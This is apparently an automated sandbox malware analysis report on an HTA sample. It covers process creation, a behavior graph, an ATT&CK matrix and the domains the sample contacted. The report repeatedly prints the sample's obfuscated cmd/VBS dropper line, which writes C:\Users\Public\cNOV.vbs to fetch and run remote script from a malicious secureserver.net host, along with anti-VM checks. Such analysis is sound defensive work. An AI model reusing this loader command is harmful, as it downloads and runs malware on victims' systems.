Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wscript.exe, 0000000C.00000002.2602563379.0000000003127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareBISIF
Source: wscript.exe, 0000000C.00000003.2601862832.0000000003196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2602009975.0000000003199000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.2602563379.000000000319A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VFTHKe
Source: mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670798916.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749294305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.2602563379.0000000003184000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.2602563379.0000000003127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2598494247.0000000003184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000C.00000003.2601862832.0000000003196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2602009975.0000000003199000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.2602563379.000000000319A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Hyper-V 2008 Beta or RC0QFWa
Source: wscript.exe, 0000000C.00000002.2602563379.000000000319A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VMware Virtual PlatformRIM
Source: mshta.exe, 00000000.00000002.2766191260.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750540197.00000000033D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: mshta.exe, 00000000.00000002.2766191260.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750540197.00000000033D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: wscript.exe, 0000000C.00000003.2601862832.0000000003196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2602009975.0000000003199000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.2602563379.000000000319A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 RTMHOHHOHH6
Source: wscript.exe, 0000000C.00000003.2601862832.0000000003196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2602009975.0000000003199000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.2602563379.000000000319A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 R2RGKRGKRGK
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts2
Windows Management Instrumentation
111
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection
NTDS33
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579831 Sample: Archivo-PxFkiLTWYG-23122024... Startdate: 23/12/2024 Architecture: WINDOWS Score: 76 40 102.57.205.92.host.secureserver.net 2->40 42 www.americanas.com.br 2->42 44 6 other IPs or domains 2->44 54 Sigma detected: Suspicious MSHTA Child Process 2->54 56 Sigma detected: WScript or CScript Dropper 2->56 58 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->58 60 2 other signatures 2->60 11 mshta.exe 86 2->11         started        signatures3 process4 dnsIp5 46 securepubads.g.doubleclick.net 172.217.19.194, 443, 49743, 49859 GOOGLEUS United States 11->46 48 s3-sa-east-1.amazonaws.com 16.12.1.68, 443, 49832 unknown United States 11->48 50 s3-r-w.sa-east-1.amazonaws.com 16.12.2.2, 443, 49834 unknown United States 11->50 64 Obfuscated command line found 11->64 15 cmd.exe 1 11->15         started        signatures6 process7 signatures8 66 Obfuscated command line found 15->66 18 cmd.exe 2 15->18         started        22 conhost.exe 15->22         started        24 cmd.exe 1 15->24         started        process9 file10 36 C:\Users\Public\cNOV.vbs, ASCII 18->36 dropped 62 Command shell drops VBS files 18->62 26 cmd.exe 1 18->26         started        28 cmd.exe 18->28         started        signatures11 process12 process13 30 cmd.exe 3 2 26->30         started        process14 32 wscript.exe 14 30->32         started        dnsIp15 38 102.57.205.92.host.secureserver.net 92.205.57.102, 443, 49837, 49845 GD-EMEA-DC-SXB1DE Germany 32->38 52 System process connects to network (likely due to code injection or exploit) 32->52 signatures16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
172.217.19.194
truefalse
    high
    102.57.205.92.host.secureserver.net
    92.205.57.102
    truetrue
      unknown
      s3-sa-east-1.amazonaws.com
      16.12.1.68
      truefalse
        high
        s3-r-w.sa-east-1.amazonaws.com
        16.12.2.2
        truefalse
          high
          www.americanas.com.br
          unknown
          unknownfalse
            high
            statics-americanas.b2w.io
            unknown
            unknownfalse
              unknown
              logs-referer.s3-sa-east-1.amazonaws.com
              unknown
              unknownfalse
                unknown
                images-americanas.b2w.io
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://102.57.205.92.host.secureserver.net//g1true
                    unknown
                    https://102.57.205.92.host.secureserver.net/g1/true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima5mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771183068.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodommshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770582217.00000000092B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.americanas.com.br/hotsite/banner-pcs?chave=dk_hm_bn_5_2_pcsmeta.largemeta.large.heightmemshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.americanas.com.br/lojas-proximas?delivery=pick-up-store&chave=dk_hm_ats_2_2_entregamshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727259266.0000000006EF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                              high
                              https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                high
                                https://www.americanas.com.br/hotsite/atendimentomshta.exe, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743405229.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745557399.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713051987.0000000009A82000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705594806.0000000009A81000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655631658.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777098061.000000000C29F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745817185.000000000C29F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.pngmshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750136023.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764615643.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751843809.00000000092CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744500179.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
